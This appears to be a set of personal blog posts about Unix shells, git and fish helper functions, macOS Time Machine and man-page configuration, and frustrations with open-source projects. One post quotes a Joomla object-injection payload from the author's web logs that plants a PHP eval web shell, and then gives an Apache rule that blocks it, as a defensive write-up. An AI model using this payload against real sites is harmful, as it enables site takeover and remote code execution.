The difficulty in getting fixes accepted to open source projects

Two and a half years ago I noticed that the Apache mod_dumpio module does not include null bytes (or the data which follows those null bytes) in its output. I searched the Apache Bugzilla database and found bz#57045, which someone had opened a year earlier, so I wrote a patch and attached it to the Bugzilla issue. When I noticed the problem I was using the then-current 2.4.16 release. There have been 13 bug fix releases since then (it’s now at 2.4.29) and my fix still hasn’t been applied. I’m a senior software engineer with nearly four decades of experience, and I’m pretty confident my fix is a) correct and b) well written. It really shouldn’t be this hard to get fixes made to open source software.

Working with git file names modified in the workspace or most recent commit

I frequently find myself wanting to perform an operation on all the files modified in the workspace or staging area. For example, open them all in an editor, or run them through a tool like clang-format or oclint. If there are no uncommitted changes I want to work with all the files in the most recent commit on the branch. To do this I wrote a gitfiles fish shell function (transforming this to bash should be trivial):

function gitfiles \
    --description 'Enumerate files in git workspace or head commit matching 0+ globs.'
    # -c: files with a C/C++ extension
    # -p: files with a .py extension
    argparse -n gitfiles c p -- $argv
    or return

    set -l patterns $argv
    if set -q _flag_c
        set -a patterns '*.c' '*.cpp' '*.h'
    end
    if set -q _flag_p
        set -a patterns '*.py'
    end

    # The `sed` below could be replaced with `string replace -r '^ *[^ ]* *' ''`.
    # However, doing so is unlikely to be measurably faster let alone noticed by a user.
    # It's also more likely to be misunderstood.
    set -l files (
        git status --porcelain --short --untracked-files=all | sed -e 's/^ *[^ ]* *//')
    if not set -q files[1]
        set files (git show --word-diff=porcelain --name-only --pretty=oneline)[2..-1]
    end

    if set -q patterns[1]
        for pattern in $patterns
            string match $pattern $files
        end | sort -u
    else
        printf '%s\n' $files
    end
end

Note that it accepts globs to limit the files to those matching one or more patterns. If no globs are specified then all modified files are listed. It supports the -c flag to match C/C++ file names and -p to match Python file names since those are the languages I work with most often.

This makes it easy to type vim (gitfiles) (which I actually wrap in a gitvim fish function) to edit all the modified files.
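The gitvim wrapper amounts to little more than this sketch (illustrative only; my actual function may differ in details):

```fish
function gitvim --description 'Edit the files modified in the workspace or head commit.'
    vim (gitfiles $argv)
end
```

Since gitvim forwards its arguments, `gitvim -c` edits only the modified C/C++ files.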

Scheduling backups on macOS Sierra and High Sierra

MacOS Sierra (OS X 10.12) changed the behavior of Time Machine from doing hourly backups to using a heuristic that decides whether to do a backup based on recent activity. For most users that’s a better approach since it makes it less likely the user will notice the performance impact of backups and it increases how far back in time backups are available. However, if you’re a software developer the new behavior is problematic. That’s because when I’m writing code, do something stupid, and need to revert the project workspace to an earlier state, I always want to be able to select a state in the near past. When backups occur at irregular intervals you might find that the most recent backup was made so long ago as to be borderline useless.

Configuring Time Machine to suit the needs of a software developer turns out to be surprisingly simple, thanks to Apple providing not just simple-to-use GUIs but excellent CLI tools. In this case the command you need is tmutil. The first step is to disable automatic backups using the System Preferences GUI or by running sudo tmutil disable. The second step is to set up a cron job by running crontab -e and adding an entry like the following:

# Every hour during the times we're likely to be working do a Time Machine
# backup.
0 7-22 * * * tmutil startbackup

That initiates a backup at the top of every hour from 0700 to 2200 hours every day of the week. I skip the other eight hours of each day because I’m unlikely to be writing code at that time. Voila! Now I can be assured that if I need to recover from a stupid mistake that a simple git checkout can’t help with I won’t have to recover more than an hour’s worth of work.

Ksh93 has unexpected, undocumented, support for math functions

I have been thinking about whether I want to contribute to the maintenance of the Korn shell (ksh93) since it was open sourced in 2013. While trying to understand the organization of the project and how to build it I noticed that the math builtin (e.g., $(( ... )) ) supports a lot of functions I was not aware of despite having used the Korn shell for more than two decades. Consider these examples:

$ echo $(( nearbyint(12.5) ))
$ echo $(( round(12.5) ))
$ echo $(( rint(12.5) ))

Why in the world should a command line shell support multiple methods to round a floating point value to an integer? There are numerous other examples of that type and they all derive from the ksh authors thinking that exposing low-level APIs to a shell script was appropriate.
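To see why there are several of these functions at all: the C library’s default IEEE rounding mode is round-half-to-even (which rint and nearbyint honor), while round() rounds halves away from zero. You don’t even need ksh to observe the former; printf’s %.0f conversion goes through the same libc machinery:

```shell
# Round-half-to-even: both 12.5 and 13.5 land on the nearest even integer.
printf '%.0f %.0f\n' 12.5 13.5    # prints: 12 14
```

Under round(), by contrast, 12.5 would become 13. That distinction matters to numerical C code; whether it belongs in a shell is the question.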

These functions are defined in src/cmd/ksh93/data/. None are documented outside of the source code other than a pro forma mention in the documentation that they exist (see the section labeled “Arithmetic Evaluation” in the man page), prefaced by this text:

Any of the following math library functions that are in the C math library can be used within an arithmetic expression:

These are the functions in that table:

# <return type: i:integer f:floating-point> [<typed-arg-bitmask>] <#floating-point-args> <function-name> [<alias>|<implementation>]
# <function-name>l and <function-name>f variants are handled by features/
# @(#) (AT&T Research) 2013-08-11
f 1 acos
f 1 acosh
f 1 asin
f 1 asinh
f 1 atan
f 2 atan2
f 1 atanh
f 1 cbrt
f 1 ceil
f 2 copysign
f 1 cos
f 1 cosh
f 1 erf
f 1 erfc
f 1 exp
f 1 exp10
f 1 exp2
f 1 expm1
f 1 fabs abs
f 2 fdim
i 1 finite
f 1 float
f 1 floor
f 3 fma
f 2 fmax
f 2 fmin
f 2 fmod
i 1 fpclassify
i 1 fpclass
f 2 hypot
i 1 ilogb
f 1 int
i 1 isfinite
i 2 isgreater
i 2 isgreaterequal
i 1 isinf
i 1 isinfinite
i 2 isless
i 2 islessequal
i 2 islessgreater
i 1 isnan
i 1 isnormal
i 1 issubnormal fpclassify=FP_SUBNORMAL
i 2 isunordered
i 1 iszero fpclassify=FP_ZERO fpclass=FP_NZERO|FP_PZERO {return a1==0.0||a1==-0.0;}
f 1 j0
f 1 j1
f 2 jn
x 2 ldexp
f 1 lgamma
f 1 log
f 1 log10
f 1 log1p
f 1 log2
f 1 logb
f 1 nearbyint
f 1 2 nextafter
f 1 2 nexttoward
f 2 pow
f 2 remainder
f 1 rint
f 1 round {Sfdouble_t r;Sflong_t y;y=floor(2*a1);r=rint(a1);if(2*a1==y)r+=(r<a1 )-(a1<0);return r;}
f 2 scalb
f 2 scalbn
i 1 signbit
f 1 sin
f 1 sinh
f 1 sqrt
f 1 tan
f 1 tanh
f 1 tgamma {Sfdouble_t r=exp(lgamma(a1));return (signgam<0)?-r:r;}
f 1 trunc
f 1 y0
f 1 y1
f 2 yn

The only way I would contribute to the evolution of ksh93 is if this bogosity were eliminated. There is no reason a CLI shell like ksh/ksh93 should support all of those math functions. In fact most of those functions have no business being available in a CLI. Consider what it means to execute $(( isfinite(1) )). In the context of a CLI shell script the isfinite() function has no meaning.

Is ksh93 still alive?

As I mentioned in my previous article I’m looking for a new shell since I’ve given up on the Fish project. For many years I used ksh88, then ksh93. After that I switched to zsh because it looked like ksh was a dead project. But two years ago the AT&T Software Technology (“AST”) toolkit was moved to GitHub and open sourced. In the past year an individual has committed some changes to the ksh source code. If it’s once again being improved it might be worth a look.

So in addition to elvish I think I’ll take another look at ksh. The Korn shell lacks many of the features people have come to expect from newer shells. Most notably a good command completion subsystem. But the ksh source code is pretty clean. It has a consistent style and good interfaces. There are things about its style I don’t like, such as the use of single-statement blocks that are not enclosed in braces, since that pattern makes it too easy to introduce a bug and makes the code harder to visually parse. Here’s an example from the getopts.c module:

                r = 0;

Still, at least the code is consistent in employing that pattern. It also omits whitespace around binary operators like minus and around the commas that separate parameters. At least most of the time. That’s something I think hurts readability, especially since it isn’t done 100% of the time. I’d probably want to run the code through clang-format and manually fix the remaining style inconsistencies before contributing more substantive changes. Much like I did for fish. The question is whether the people with commit privileges would accept such changes. And whether they would be open to the idea of implementing some of the ideas from newer shells like fish.

Time to pick a new shell: fish, xonsh, elvish, bash, zsh, ksh93

Why aren’t there any good alternatives to bash or zsh? Specifically, an OS CLI shell that does not suffer from the problems inherent in being compliant with the POSIX.2 (aka POSIX 1003.2) standard? And one that also doesn’t suffer from the other problem bash and zsh have: all the configurable behaviors that make it effectively impossible to predict how those shells will behave?

Two years ago I got fed up with zsh and wrote a blog post explaining why. That caused me to look for a saner alternative. I considered xonsh because it is based on Python, which is one of my two favorite programming languages (the other being C). But I gave up on xonsh fairly quickly. I eventually settled on Fish.

I had some misgivings about the Fish project because, as of Sep 2015, it had numerous open pull-requests, including several more than a year old and quite a few older than three months. The source code (both C++ and functions written in its native script language) was also a mess, with no coherent style and hundreds of lint errors. At least two lint errors identified actual bugs and most of the remainder pointed out code that was hard to understand. Too, there were a couple hundred open issues more than three years old which even a cursory review suggested were no longer relevant. Nonetheless, I chose it as my new day to day shell and started contributing changes to the project. Primarily because its explicit non-adherence to the POSIX 1003.2 standard for shells meant it had far fewer surprising behaviors. It also had several innovative ideas such as every variable being an array even if it contained only a single element.
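Fish’s every-variable-is-an-array idea is easy to demonstrate in fish itself (illustrative snippet):

```fish
set -l x hello        # looks like a scalar...
count $x              # ...but is a one-element array: prints 1
set -a x world        # append a second element
echo $x[2]            # indexing works on any variable: prints world
```

There is no separate scalar type to trip over; commands like count and string operate uniformly on any variable.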

Near the end of 2015 I was offered commit privileges; that is, becoming a member of the core development team. I demurred at that time because I wasn’t sure I was going to use Fish long term. But in late January 2016 I accepted the invite to join the core dev team. Primarily because the development team expressed no objections to my requirement that the code style be standardized and changes to deal with oclint and cpplint errors would be merged without debate.

I spent several months doing things like running the code through clang-format and oclint and fixing problems they found. As well as making it easy for everyone else to do so by adding new build targets like make style and make lint. Once the code was in a better state I felt more comfortable making more substantive changes.

Fast-forward to today, where I am looking for a different shell to be my day to day interactive shell. Why? There are several reasons. Such as the fact that the Fish model for I/O redirection and pipelines is broken and results in FAQs from people who expect the saner behavior provided by nearly every other shell. Broken behavior I accepted till now because I hoped such problems would be fixed sooner rather than later. I no longer believe that will happen. Again, why? Because there have been too many arguments over bike-shedding issues like whether all-uppercase variable names like FISH_HISTORY and FISH_VERSION should be renamed to lowercase. Or, in the case of FISH_VERSION, renamed to version because one developer is a fan of csh (actually tcsh, although they never use that term). More importantly, no one but myself seemed to be interested in setting a consistent vision for future releases with milestones and a roadmap.

Another example: Fish issue #478 was opened five years ago by xiaq to suggest improving how command options are handled. Keep in mind the ID of the person who opened that issue as it’s important to this blog post. I commented a year ago asking if we should implement a Fish-compatible getopt command. Fast forward to today. I opened a new issue asking for feedback on a different approach to issue #478, mostly because it seemed like the DocOpt based solution would never be implemented. Too, I was not convinced the DocOpt idea was sound. I implemented the argparse command and the feedback was uniformly positive and resulted in several subsequent improvements. The Fish developer I’ve clashed with from the day they were granted commit privileges then reopened issue #478, and the leader of the fish project stated they still wanted to try to implement that solution. I’m wondering if I’ll die of old age before that happens. Especially since the Python DocOpt project, which has existed for five years and was the basis for the proposed fish implementation, hasn’t seen a substantive commit in more than two years and still hasn’t reached a v1.0 release.

I have no intention of going back to either bash or zsh as my day to day interactive shell. They have too much baggage and broken behaviors. Zsh in particular suffers from a lack of a coherent vision which has led to the project incorporating too many incompatible behaviors via configurable options.

So I’m once again looking for an innovative shell that I could use on a daily basis and whose project I would be willing to contribute non-trivial changes to. I took another look at Xonsh but was put off by the fact it has several pull-requests more than a year old and most of the others are more than a month old. Too, it has recently implemented things like the cat command as a builtin, which seems rather pointless.

The current candidate for my new day to day shell is Elvish. It is even more extreme in its departure from traditional POSIX.2 shells than fish is compared to shells like ksh, bash, and zsh. But therein lies its strength. Elvish is based on sound programming language principles rather than the ad hoc mess that is the original Bourne shell and all subsequent POSIX.2-based shells. My primary concern is how it handles external commands that exit with a non-zero status. At present it turns that into an exception. Which means Elvish behaves as if bash/ksh/zsh were running with set -o errexit in effect. This is great from a safety perspective. The problem is that there are a large number of commands which exit with a non-zero status for non-fatal situations. The grep command, for example, exits with a status of one if no lines matched the pattern. That is rarely a fatal error that deserves raising an exception.
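A quick illustration of the behavior that worries me:

```shell
# grep exits 1 when no lines match -- an everyday condition, not an error.
printf 'foo\n' | grep bar
echo "grep exit status: $?"    # prints: grep exit status: 1
```

An errexit-style shell, or Elvish’s exception model, would abort at the grep even though nothing actually went wrong.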

An interesting injection attach via the HTTP user agent string

Looking at my web server logs this morning I noticed a new attack signature. The attacker performs a “GET /” with this “User-Agent” header:

}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:239:\"file_put_contents($_SERVER[\"DOCUMENT_ROOT\"].chr(47).\"shootme.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST['360'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_POST['z0']);@eval(\\\"\\\\\\x24safedg=\\x24xsser;\\\");}\");JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}~\xd9

It’s obviously a code injection attack. Googling tells me this attack was first documented in December 2015, for example in this writeup. It’s an attempt to inject code via a Joomla CMS vulnerability. I don’t use Joomla so this doesn’t affect my site.

I already had some Apache HTTPD rules to protect against malicious user agent strings including one to detect if it begins with a left bracket:

RewriteCond %{HTTP_USER_AGENT} ^\[ [OR]

Noticing this attack suggests that generalizing that rule would be helpful. So my Apache config now contains this instead:

# If first char isn't an alphanumeric or underscore it's quite possibly an
# attempt to inject code.
RewriteCond %{HTTP_USER_AGENT} ^\W [OR]
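In context, the condition needs a RewriteRule to act on it. A minimal sketch (the standalone placement and 403 response are illustrative; my real config chains several conditions with [OR] before a single rule):

```
RewriteEngine On
# If first char isn't an alphanumeric or underscore it's quite possibly an
# attempt to inject code.
RewriteCond %{HTTP_USER_AGENT} ^\W
RewriteRule .* - [F]
```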

I got hacked

I really dislike both PHP and WordPress despite using the latter, and thus the former implicitly, for this blog. Why? Because both make it far too easy to be hacked. Which happened to me just a few days ago, despite my not installing any third-party WordPress plugins, having a robust firewall against malformed web requests, and regularly updating my software. In this case someone exploited a WordPress 4.7.0/4.7.1 vulnerability recently introduced into its REST API. They managed to replace my most recent post prior to this one. Google “attack /index.php/wp-json/wp/v2/posts” to learn more about this vulnerability.

Fortunately I backup my WordPress database and was thus able to restore it to a known good state. And this particular vulnerability did not allow the attacker to change any files; only content in the WP database. I was fortunate because I make regular backups of critical files and have my web site managed by git source code management. The former made it relatively easy to recover from the hack and the latter made it easy to determine my static content had not been compromised.

Xonsh is no longer a possible replacement for zsh

A few weeks ago I wrote about my dissatisfaction with zsh. I decided to take a close look at xonsh and fish.

I decided to try xonsh first because I’m a Python aficionado (I’ve been using it as my primary language for eight years). The idea of using all of my favorite Python language features and standard library along with the ease of launching external commands with I/O redirection and pipelines was intriguing. Because xonsh is currently at version 0.2.3 it was clear that the author didn’t believe it was ready for prime time. Nonetheless, I was willing to give it a try as the documentation and mailing list suggested it was in good enough shape for a software engineer like myself who is used to rapidly changing software.

The first thing I did after installing it was run a few external commands and python statements. I then showed the command history using the builtin history command. So far, so good. I then tried showing the most recent command in the history using history show -1. That worked fine. Okay, let’s do something a little more challenging; show the most recent five history entries:

$ history show -5:
usage: history [-h] {show,id,file,info,diff,replay,gc} ...
history: error: unrecognized arguments: -5:

Oops! The documentation says that should work. The inverse, showing the first five entries with history show :5, does work. So I sent a message to the mailing list. Almost immediately the creator of xonsh responded with a proposed fix in the form of a github pull request. Looking at the proposed fix I saw my first red flag. The fix was a kludge and included no unit tests to ensure that the fix was correct and to keep regressions from occurring. I countered with my own pull request that included extensive unit tests for the bug I was fixing.

I was happy to see that the author cares about fixing bugs in a timely manner. I was less happy that his proposed fix was something I would barely tolerate from a summer intern. Worse, before creating my fix I ran pylint against the module. OMFG! Pylint gave it a score of 7.13 out of 10. Worse, pylint pointed out two outright bugs due to misnamed variables. The only way to tell if my change introduced more lint was to diff the lint output before and after my fix was committed. That is totally unacceptable. Too, the entire code base was riddled with problems ranging from the trivial (trailing whitespace, overly long lines) to the serious (missing doc strings, too many references to protected object members).

I was also deeply troubled by such bogosities as injecting __xonsh_history__ and __xonsh_env__ into the builtins module scope. Not only that, but those are the primary means of accessing xonsh configurable settings. Ugh! For example, from one of its modules:

data_dir = builtins.__xonsh_env__.get('XONSH_DATA_DIR')

Despite that rocky start I thought there was enough positive things about the project to try using it and contributing to its improvement. But the code would have to be cleaned up before I would make any other substantive changes. So I asked it would be okay if I contributed a sequence of changes to make the code lint clean. Getting the green light I submitted several lint cleanup pull requests. Getting each one accepted was a challenge. Primarily because the project owner isn’t really interested in having lint clean code. The final straw that made me decide to give up on the project as hopeless were two cleanups the project owner objected to.

The first was changing

if len(inp) == 0:

to

if not inp:

Anthony told me to revert that because he didn’t like the negative conditional. The second was changing

for d in filter(os.path.isdir, path):

to

for d in (p for p in path if os.path.isdir(p)):

Anthony’s objection this time was that he prefers filter and map to list comprehensions and generator expressions. When I countered that filter and map are deprecated he said, in effect, “why are they builtins if they’re deprecated?” All you have to do is Google “python map filter deprecated”. One of the top results is this article by Guido van Rossum proposing that map, filter, and reduce be removed from Python 3. There are plenty of other web pages that also make the case for not using them.

In other words, Anthony tries to use Python as if it were a different language. He doesn’t appreciate that there is such a thing as idiomatic Python. Anthony believes that just because you can achieve a result in more than one way there is no reason to prefer one alternative over another other than personal preference. Sorry, but I can’t contribute to a project with those ideals.

So I’m off to try fish.

P.S., I forgot to mention two other things that gave me a WTF moment. The first was when I noticed that the directions for running the unit tests did not test the code in my local git repository — they tested the code installed by pip. The tests were also not hermetic — they were affected by my local ~/.xonshrc file. Too, I couldn’t just type “make test” to execute the tests. So I decided to fix all of those problems. In the process of getting my changes accepted Anthony told me he wrote the directions to specifically test the installed code, not the code in his git repository, and that he didn’t understand why anyone would test their uncommitted code. So either he doesn’t test changes before committing them or he regularly installs and runs untested code.

Second, the history subsystem is weird. Don’t take my word for it, go read the xonsh history documentation. Notice too this only partially correct assertion in the first paragraph of that page: “This is saved when the shell exits”. Okay, that is true of bash but it’s not true of many other shells sharing the same Bourne shell lineage such as zsh. Also, bash provides history -a to manually save the history and history -r to read it so you’re not limited to writing the current shell history only when it exits. Yes, yes, that’s a pretty braindead approach so I agree with Anthony regarding bash but other shells like zsh have managed to implement a sane solution without requiring xonsh’s ridiculously over-engineered solution.

Mac OS X man command ignores $MANPATH (which sucks for HomeBrew installed commands)

I recently ran brew install coreutils to get the GNU versions of various commands such as ls. The first thing I noticed was that “man ls” did not display the man page for the GNU ls command. Even after setting the $MANPATH environment variable to include the relevant directory the man page was not displayed. Not even with “man -a ls” which should have shown all matching man pages in succession. The $MANPATH environment variable is completely ignored on Mac OS X as far as I can determine.

Similarly, editing /etc/manpaths and creating a file in /etc/manpaths.d containing the appropriate paths had no effect.

Only editing /etc/man.conf had any effect. Furthermore, it was not enough to simply add a MANPATH directive before any of the stock entries. Doing so did allow “man -a ls” to display the GNU ls man page but it was still not the primary man page. To make the GNU ls man page the primary one I also had to add a MANPATH_MAP directive before any of the other MANPATH_MAP directives. Once I did that, executing “man ls” and “man -w ls” showed the HomeBrew installed ls command man page as the primary documentation for that command.
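An illustrative sketch of such /etc/man.conf entries (the paths assume Homebrew’s coreutils layout under /usr/local/opt; I’m not reproducing my exact config):

```
# Must appear before the stock MANPATH and MANPATH_MAP entries.
MANPATH /usr/local/opt/coreutils/libexec/gnuman
MANPATH_MAP /usr/local/opt/coreutils/libexec/gnubin /usr/local/opt/coreutils/libexec/gnuman
```

The MANPATH line makes the GNU pages findable at all; the MANPATH_MAP line is what makes them primary for commands run from the gnubin directory.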

Note that by default the man pages for HomeBrew commands that do not shadow standard commands are found and displayed by the man command. That is because a “MANPATH /usr/local/share/man” entry in /etc/man.conf is sufficient to find the associated man pages. It’s not clear whether that entry is present in a stock Mac OS X installation or is added by HomeBrew.

I love Mac OS X and would rather get a root canal than use MS Windows. But once in a while an annoyance like this one makes me wonder if anyone at Apple actually verifies that the software behaves as the documentation states.